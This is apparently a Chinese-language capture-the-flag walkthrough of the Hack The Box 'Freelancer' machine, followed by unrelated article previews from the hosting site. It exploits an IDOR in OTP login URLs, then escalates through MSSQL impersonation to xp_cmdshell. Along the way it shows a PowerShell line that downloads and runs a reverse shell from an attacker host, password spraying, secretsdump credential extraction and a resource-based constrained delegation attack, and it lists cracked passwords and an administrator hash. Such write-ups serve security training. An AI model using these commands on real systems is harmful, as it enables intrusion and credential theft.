htb_Freelancer

在这里插入图片描述
端口扫描

80 88 389 445
在这里插入图片描述
扫描ldap协议相关漏洞,没有发现
在这里插入图片描述
扫描子域名,加入/etc/hosts(后面发现没用)
在这里插入图片描述
枚举域用户
在这里插入图片描述
目录扫描,发现一个/admin目录
在这里插入图片描述
访问后发现要账号密码
在这里插入图片描述
访问80端口,注册一个freelancer用户

查看Blog,底部评论区可看见有用户

在这里插入图片描述
点击用户查看,发现修改url中的数字可以查看不同用户

在这里插入图片描述

当url为http://freelancer.htb/accounts/profile/visit/2/时,为admin用户的个人信息
在这里插入图片描述

到处看都没其他发现,回头注册一个employer account
在这里插入图片描述

找一下哪里可以激活账户
重新进行目录扫描,这次直接扫描/accounts目录,发现一个/accounts/recovery/目录
在这里插入图片描述

输入注册时填的信息,提交后就可以通过认证了
在这里插入图片描述

功能和Freelancer用户大差不差
在这里插入图片描述

看个人信息配置,发现一个二维码,提示扫码后可以直接登录账户
在这里插入图片描述

扫一下,扫出来一个url
url后面那截很耐人寻味,MTAwMTA=,=结尾看上去就像base64
在这里插入图片描述

果不其然,解码后发现是一个用户编号
在这里插入图片描述

想起来刚刚看见admin用户的编号是2,将2进行base64编码,修改url信息
在这里插入图片描述
后面是随机序列,只有五分钟有效期

http://freelancer.htb/accounts/login/otp/Mg==/xxxxxxxxxxxxxxxxxxxxxxxx/

访问url,成功切换到admin用户,这里存在IDOR越权漏洞

在这里插入图片描述

重新访问刚刚需要密码登录的/admin/目录,直接就进来了

在这里插入图片描述

底下有个sql terminal,可以执行sql命令在这里插入图片描述

尝试使用xp_cmdshell,权限拒绝
在这里插入图片描述

查看数据库所有者,sqlServer一般是sa

SELECT suser_sname(owner_sid) FROM sys.databases

,

查看数据库用户,现在的用户大概是guest或者最底下那个Freelancer_webapp_user

EXECUTE AS LOGIN = 'sa'
SELECT name FROM sys.database_principals WHERE type_desc IN ('SQL_USER', 'WINDOWS_USER', 'WINDOWS_GROUP');

在这里插入图片描述

查看sa是否为数据库管理员(有执行命令权限)

EXECUTE AS LOGIN = 'sa'
SELECT IS_SRVROLEMEMBER('sysadmin');

在这里插入图片描述

使用sa权限为Freelancer_webapp_user用户授予sysadmin权限

EXECUTE AS LOGIN = 'sa'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user','sysadmin';

查看当前用户是否为sysadmin权限

SELECT IS_SRVROLEMEMBER('sysadmin');

在这里插入图片描述

启用xp_cmdshell

EXEC sp_configure 'show advanced options', '1';
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', '1' ;
RECONFIGURE;

在这里插入图片描述

可以执行cmd命令了
反弹shell(gitHub上找了一个最新的)添加链接描述

EXECUTE xp_cmdshell ‘powershell -c iex(iwr -usebasicparsing http://10.10.14.50:8899/shel1.ps1)’
在这里插入图片描述

查看用户列表
在这里插入图片描述
C:\users\sql_sve\Downloads\SqLEXPR-2019_x64_ENU目录下发现一个configuration文件
在这里插入图片描述

IL0v3ErenY3ager
t3mp0r@ryS@PWD

将两个密码弄出来做字典

再把刚刚的用户列表也弄下来

Administrator
lkazanof
lorra199
mikasaAckerman
MSSQLSERVER
sqlbackupoperator
sql_svc

使用crackmapexec进行密码喷洒

crackmapexec smb 10.10.11.5 -u user.txt -p pass.txt --sam

在这里插入图片描述
mikasaAckerman/IL0v3ErenY3ager

上传RunasCs,登录

curl http://10.10.14.50:8899/RunasCs.exe -o RunasCs.exe

在这里插入图片描述

./RunasCs.exe mikasaAckerman IL0v3ErenY3ager powershell -r 10.10.14.50:2222

成功切换到mikasaAckerman用户

在这里插入图片描述

找user.txt的时候发现目录底下有两个特殊文件
在这里插入图片描述
mail.txt中重点是给了一个dump文件,大概就是目录里的MEMORY.7z
在这里插入图片描述
目标机器上有python,直接开启一个http服务,将MEMORY.7z下载到本地
在这里插入图片描述
下载速度有点小慢

在这里插入图片描述

解压后是一个dmp文件

在这里插入图片描述

使用memprocfs将dmp中虚拟文件系统挂载到本机的物理内存,可以查看文件目录

./memprocfs -device MEMORY.DMP -mount /mnt

在这里插入图片描述
该目录底下是windows注册表配置单元,使用secretsdump可以从注册表中提取密码

system,security,sam几个文件搂下来

在这里插入图片描述
改一下名字

mv 0xffffd3067d935000-SAM-MACHINE_SAM.reghive sam

mv 0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive system

mv 0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive security

使用secretsdump解密密码
在这里插入图片描述

impacket-secretsdump -sam sam -system system -security security local

在这里插入图片描述

PWN3D#l0rr@Armessa199

继续进行喷洒

crackmapexec smb 10.10.11.5 -u user.txt -P PWN3D#l0rr@Armessa199

得到新用户凭据

lorra199:PWN3D#l0rr@Armessa199

机器开放了5985端口,可以远程登录

在这里插入图片描述

evil-winrm -i 10.10.11.5 -u "lorra199" -p "PWN3D#l0rr@Armessa199"

在这里插入图片描述
同步时间

ntpdate -q freelancer.htb

在这里插入图片描述

使用bloodhound探测域内环境

faketime -f +5h bloodhound-python -c ALL -u lorra199 -p 'PWN3D#l0rr@Armessa199' -d freelancer.htb -ns 10.10.11.5

在这里插入图片描述
发现lorra199用户位于AD RECYCLE BIN组内,该组对dc有GenericWrite权限

同时lorra199用户可以添加机器用户,可以通过修改dc的msDS-AllowedToActOnBehalfOfOtherIdentity属性进行基于资源的约束性委派攻击
在这里插入图片描述
添加机器用户

impacket-addcomputer -computer-name 'cccc$' -computer-pass '123456cc!' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'

在这里插入图片描述

使用impacket的rbcd模块进行攻击,修改DC$的msDS-AllowedToActOnBehalfOfOtherIdentity属性指向cccc$

impacket-rbcd -delegate-from 'cccc$' -delegate-to 'DC$' -dc-ip 10.10.11.5 -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'

在这里插入图片描述

getST模块获取到administrator的cifs/dc.freelancer.htb的ST

faketime -f +5h impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate Administrator -dc-ip 10.10.11.5 freelancer.htb/cccc$:'123456cc!'

在这里插入图片描述

将票据导入内存

export KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache

secretsdump提取administrator密码

faketime -f +5h impacket-secretsdump 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.10.11.5 -target-ip 10.10.11.5 -just-dc-ntlm

在这里插入图片描述

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::

使用evil-winrm登录

evil-winrm -i freelancer.htb -u administrator -H '0039318f1e8274633445bce32ad1a290'

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/713522.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

关于二分法的理解(以JS为例)

算法介绍 基本概念 二分查找算法,又称折半查找算法,是一种在有序数组中查找特定元素的高效方法。它的核心思想是将数组分成两半,然后根据目标值与中间元素的比较结果来决定是继续在左半部分还是右半部分进行搜索。 工作原理 初始化&#…

Vue3+Vite报错:vite忽略.vue扩展名 Failed to resolve import ..... Does the file exist?

Vue3Vite报错:vite忽略.vue扩展名 Failed to resolve import … Does the file exist? 先看报错: 分析原因 原因是我们没有写后缀名 建议你在你的vite.config.js中加上如下配置 import { defineConfig } from "vite"; import vue from &qu…

股指期货功能

其金融期货的本质,决定了股指期货具有以下几方面特点: (1)交割方式为现金交割; (2)股指期货的持有成本较低; (3)股指期货的保证金率较低,杠杆性…

R 初级教程之一

IT的发展目前已经相当的内卷,到处都在说24年是将来4年最难的一年!确实是,眼下各大厂商都在疯狂的裁员砍掉不营利的业务,收紧业务,不再盲目的扩张。小公司更是水深火热,无以言表。近期有个医院联系让使用R给…

Zombie Animations Set

僵尸动画合集,包括成对攻击/抓取、各种移动方式、爬行、击中反应、死亡动画等。 生产说明 动画总数:99(包括22个位置变化) 配对动画:36 攻击次数:6次 爬网:9 命中反应:6 空转:14 行程2 跑步次数:9次 短跑:2 匝数:3 步行次数:12次 免责声明 任何游戏玩法蓝图都不包…

【计算机毕业设计】240基于微信小程序的校园综合服务平台

🙊作者简介:拥有多年开发工作经验,分享技术代码帮助学生学习,独立完成自己的项目或者毕业设计。 代码可以私聊博主获取。🌹赠送计算机毕业设计600个选题excel文件,帮助大学选题。赠送开题报告模板&#xff…

禁止methtype联网

mathtype断网_如何禁止mathtype联网-CSDN博客https://blog.csdn.net/qq_41060221/article/details/128144783

StarNet实战:使用StarNet实现图像分类任务(二)

文章目录 训练部分导入项目使用的库设置随机因子设置全局参数图像预处理与增强读取数据设置Loss设置模型设置优化器和学习率调整策略设置混合精度,DP多卡,EMA定义训练和验证函数训练函数验证函数调用训练和验证方法 运行以及结果查看测试完整的代码 在上…

微服务开发与实战Day09 - Elasticsearch

一、DSL查询 Elasticsearch提供了DSL(Domain Specific Language)查询,就是以JSON格式来定义查询条件。类似这样: DSL查询可以分为两大类: 叶子查询(Leaf query clauses):一般是在特…

局域网内怎么访问另一台电脑?(2种方法)

案例:需要在局域网内远程电脑 “当我使用笔记本电脑时,有时需要获取保存在台式机上的文件,而两者都连接在同一个局域网上。我的台式机使用的是Windows 10企业版,而笔记本电脑则是Windows 10专业版。我想知道是否可以通过网络远程…

JVM 性能分析——jdk 自带命令分析工具(jps/jstat/jinfo/jmap/jhat/jstack)

文章目录 jps(Java Process Status):查看正在运行的Java进程jstat(JVM Statistics Monitoring Tool):查看 JVM 的统计信息jinfo(Configuration Info for Java):实时查看和…

zip加密txt文件后,暴力破解时会有多个解密密码可以打开的疑问??

最近在做一个关于zip压缩文件解密的测试,发现通过暴力解密时,会有多个解密密码可以打开,非常疑惑,这里做个问题,希望能有大佬解惑。 1、首先在本地创建一个113449.txt的文件,然后右键txt文件选择压缩&…

AI赋能软件测试

AI赋能软件测试 AI赋能软件测试软件测试分类软件质量模型:用来衡量软件质量的维度AI赋能软件测试 随着AI时代的到来,如何轻松掌握软件测试新趋势,将AI技术应用于软件测试行业,提高测试速度与测试效率~~ 传智星云AI助手:https://nebula.itcast.cn tips:各种AI工具应有尽有…

图像处理方向信息

前言 Exif 规范 定义了方向标签,用于指示相机相对于所捕获场景的方向。相机可以使用该标签通过方向传感器自动指示方向,也可以让用户通过菜单开关手动指示方向,而无需实际转换图像数据本身。 在图像处理过程中,若是原图文件包含…

jeecg快速启动(附带本地运行可用版本下载)

版本整理(windows x64位): redis:3.0.504 MYSQL:5.7 Maven:3.9.4(setting文件可下载) Nodejs:v16.20.2(建议不要安装默认路径下,如已安装在c盘,运行yarn报…

MySQL之优化服务器设置(五)

优化服务器设置 高级InnoDB设置 innodb_old_blocks_time InnoDB有两段缓冲池LRU(最近最少使用)链表,设计目的是防止换出长期很多次的页面。像mysqldump产生的这种一次性的(大)查询,通常会读取页面到缓冲池的LRU列表,从中读取需要的行&…

安装wsl

安装wsl 先决条件: 打开控制面板->选择程序与功能->选择启动或关闭windows功能,将以下框选的勾选上 二、到Mircosoft store下载Ubuntu 三、如果以上都勾选了还报以下错误 注册表错误 0x8007019e Error code: Wsl/CallMsi/REGDB_E_CLASSNOTREG…

机器学习周报第46周

目录 摘要Abstract一、文献阅读1.1 摘要1.2 研究背景1.3 论文方法1.4 模块分析1.5 网络规格1.6 高效的端到端对象检测1.7 mobile former模块代码 目录 摘要Abstract一、文献阅读1.1 摘要1.2 研究背景1.3 论文方法1.4 模块分析1.5 网络规格1.6 高效的端到端对象检测1.7 mobile f…

9. 文本三剑客之awk

文章目录 9.1 什么是awk9.2 awk命令格式9.3 awk执行流程9.4 行与列9.4.1 取行9.4.2 取列 9.1 什么是awk 虽然sed编辑器是非常方便自动修改文本文件的工具,但其也有自身的限制。通常你需要一个用来处理文件中的数据的更高级工具,它能提供一个类编程环境来…

JVM-GC-什么是垃圾

JVM-GC-什么是垃圾 前言 所谓垃圾其实是指,内存中没用的数据;没有任何引用指向这块内存,或者没有任何指针指向这块内存。没有的数据应该被清除,垃圾的处理其实是内存管理问题。 JVM虽然不直接遵循冯诺依曼计算机体系架构&#…